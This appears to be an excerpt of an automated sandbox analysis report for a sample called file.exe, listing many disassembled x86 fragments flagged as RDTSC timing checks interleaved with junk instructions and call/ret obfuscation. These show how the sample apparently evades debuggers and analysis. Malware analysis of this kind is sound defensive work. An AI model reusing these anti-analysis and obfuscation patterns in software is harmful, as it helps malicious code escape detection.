                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055990 second address: 10559B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF40431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F72FCF40426h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10575F8 second address: 105760C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jbe 00007F72FCD84E8Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105760C second address: 10576B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnl 00007F72FCF40426h 0x0000000b jmp 00007F72FCF40435h 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F72FCF40428h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d jmp 00007F72FCF40438h 0x00000032 sub edi, dword ptr [ebp+124680D2h] 0x00000038 push 00000000h 0x0000003a call 00007F72FCF4042Ah 0x0000003f jl 00007F72FCF40438h 0x00000045 jmp 00007F72FCF40432h 0x0000004a pop edi 0x0000004b push 00000000h 0x0000004d sub dword ptr [ebp+1245777Dh], ecx 0x00000053 xor edi, 4177F778h 0x00000059 xchg eax, ebx 0x0000005a jnc 00007F72FCF4042Eh 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10576B9 second address: 10576BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10576BD second address: 10576C7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F72FCF40426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10576C7 second address: 10576CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058BBD second address: 1058BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10596AE second address: 10596B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10596B3 second address: 10596CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72FCF40435h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1059775 second address: 105977F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F72FCD84E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B64C second address: 105B652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B652 second address: 105B656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B656 second address: 105B662 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B662 second address: 105B671 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F72FCD84E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1059489 second address: 1059490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F0A8 second address: 105F0BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCD84E93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F0BF second address: 105F0C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F0C6 second address: 105F0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jbe 00007F72FCD84E8Eh 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060041 second address: 1060047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E1E3 second address: 105E1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060F60 second address: 1060F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F72FCCFD2F6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060F71 second address: 1060F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10601FF second address: 1060203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10602D7 second address: 10602E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10652D3 second address: 10652DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F72FCCFD2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10652DD second address: 10652E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10652E1 second address: 106536B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F72FCCFD306h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F72FCCFD2F8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D301Bh] 0x0000002f push 00000000h 0x00000031 pushad 0x00000032 call 00007F72FCCFD303h 0x00000037 mov eax, dword ptr [ebp+122D388Eh] 0x0000003d pop edi 0x0000003e or ebx, dword ptr [ebp+12460A20h] 0x00000044 popad 0x00000045 jmp 00007F72FCCFD2FEh 0x0000004a push 00000000h 0x0000004c sub dword ptr [ebp+122DB973h], edx 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jbe 00007F72FCCFD2FCh 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106536B second address: 106536F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061143 second address: 1061167 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F72FCCFD2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F72FCCFD306h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066481 second address: 10664FF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F72FCF3DBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F72FCF3DBC8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D3786h] 0x0000002e mov dword ptr [ebp+122D1D7Dh], ecx 0x00000034 push 00000000h 0x00000036 pushad 0x00000037 mov di, dx 0x0000003a add cx, C088h 0x0000003f popad 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F72FCF3DBC8h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 00000015h 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c or ebx, 48615F45h 0x00000062 mov di, 7058h 0x00000066 xchg eax, esi 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b ja 00007F72FCF3DBC6h 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10664FF second address: 1066509 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F72FCCFD2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061167 second address: 10611EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F72FCF3DBD2h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c sub dword ptr [ebp+122D1BBAh], edi 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, dword ptr [ebp+122D38CAh] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov ebx, esi 0x00000028 mov eax, dword ptr [ebp+122D0E65h] 0x0000002e mov dword ptr [ebp+122D2DACh], eax 0x00000034 and di, E200h 0x00000039 push FFFFFFFFh 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F72FCF3DBC8h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 nop 0x00000056 jno 00007F72FCF3DBDCh 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10611EF second address: 10611F9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F72FCCFD2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067456 second address: 106749C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d mov bx, di 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F72FCF3DBC8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e ja 00007F72FCF3DBC8h 0x00000034 pushad 0x00000035 js 00007F72FCF3DBC6h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10655C3 second address: 10655E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F72FCCFD309h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10655E5 second address: 10655EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063463 second address: 106346A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068332 second address: 1068341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F72FCF3DBC6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064413 second address: 1064417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064417 second address: 1064425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F72FCF3DBC6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064425 second address: 1064437 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F72FCCFD2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069360 second address: 1069365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064437 second address: 106443D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069365 second address: 10693B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a stc 0x0000000b push 00000000h 0x0000000d mov bx, D514h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F72FCF3DBC8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 jmp 00007F72FCF3DBD9h 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10693B4 second address: 10693BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B355 second address: 106B35A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B35A second address: 106B3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F72FCCFD2F8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov ebx, dword ptr [ebp+122D1C28h] 0x0000002a push 00000000h 0x0000002c mov bx, E6BDh 0x00000030 push 00000000h 0x00000032 jnc 00007F72FCCFD2F6h 0x00000038 xchg eax, esi 0x00000039 jnp 00007F72FCCFD311h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F72FCCFD2FAh 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B3C5 second address: 106B3DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF3DBD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C29F second address: 106C2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F72FCCFD2FFh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C2B8 second address: 106C2C2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F72FCF3DBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10676B3 second address: 10676BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10694C7 second address: 10694EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F72FCF3DBD7h 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F72FCF3DBC6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10694EF second address: 10694F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A554 second address: 106A558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10695BA second address: 10695C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B671 second address: 106B690 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F72FCF3DBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F72FCF3DBCFh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B690 second address: 106B696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B696 second address: 106B69C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D475 second address: 106D48C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCCFD303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D48C second address: 106D491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D491 second address: 106D497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10708B2 second address: 10708B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10708B8 second address: 10708C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F72FCCFD2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10708C2 second address: 10708C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1015E0B second address: 1015E26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F72FCCFD306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10770DD second address: 10770E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077367 second address: 107736B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10774C7 second address: 10774CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10774CB second address: 10774E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F72FCCFD304h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10774E5 second address: 10774F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F72FCF3DBC6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107AA52 second address: 107AA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107AB38 second address: EA1B53 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F72FCF3DBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 4461E9FCh 0x00000012 pushad 0x00000013 adc esi, 266133F3h 0x00000019 jnl 00007F72FCF3DBC8h 0x0000001f popad 0x00000020 push dword ptr [ebp+122D00DDh] 0x00000026 stc 0x00000027 call dword ptr [ebp+122D2CD4h] 0x0000002d pushad 0x0000002e sub dword ptr [ebp+122D1C0Dh], ecx 0x00000034 xor eax, eax 0x00000036 jng 00007F72FCF3DBCCh 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 pushad 0x00000041 or dword ptr [ebp+122D300Fh], eax 0x00000047 js 00007F72FCF3DBCCh 0x0000004d add edx, dword ptr [ebp+122D39BEh] 0x00000053 popad 0x00000054 mov dword ptr [ebp+122D38DEh], eax 0x0000005a mov dword ptr [ebp+122D300Fh], edi 0x00000060 mov esi, 0000003Ch 0x00000065 jmp 00007F72FCF3DBD3h 0x0000006a add esi, dword ptr [esp+24h] 0x0000006e mov dword ptr [ebp+122D1C0Dh], edx 0x00000074 lodsw 0x00000076 jl 00007F72FCF3DBDCh 0x0000007c jnp 00007F72FCF3DBD6h 0x00000082 jmp 00007F72FCF3DBD0h 0x00000087 add eax, dword ptr [esp+24h] 0x0000008b jmp 00007F72FCF3DBCCh 0x00000090 mov ebx, dword ptr [esp+24h] 0x00000094 pushad 0x00000095 push edi 0x00000096 or dx, D741h 0x0000009b pop ebx 0x0000009c mov eax, dword ptr [ebp+122D38B2h] 0x000000a2 popad 0x000000a3 nop 0x000000a4 push eax 0x000000a5 push edx 0x000000a6 push ecx 0x000000a7 jp 00007F72FCF3DBC6h 0x000000ad pop ecx 0x000000ae rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108171A second address: 1081720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108047C second address: 108049A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F72FCF3DBD9h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108144B second address: 108144F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085ABB second address: 1085AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084992 second address: 10849C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCCFD304h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F72FCCFD300h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10849C1 second address: 10849D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F72FCF3DBCCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10849D1 second address: 1084A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F72FCCFD30Bh 0x0000000a jmp 00007F72FCCFD305h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F72FCCFD308h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BE8B second address: 105BE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
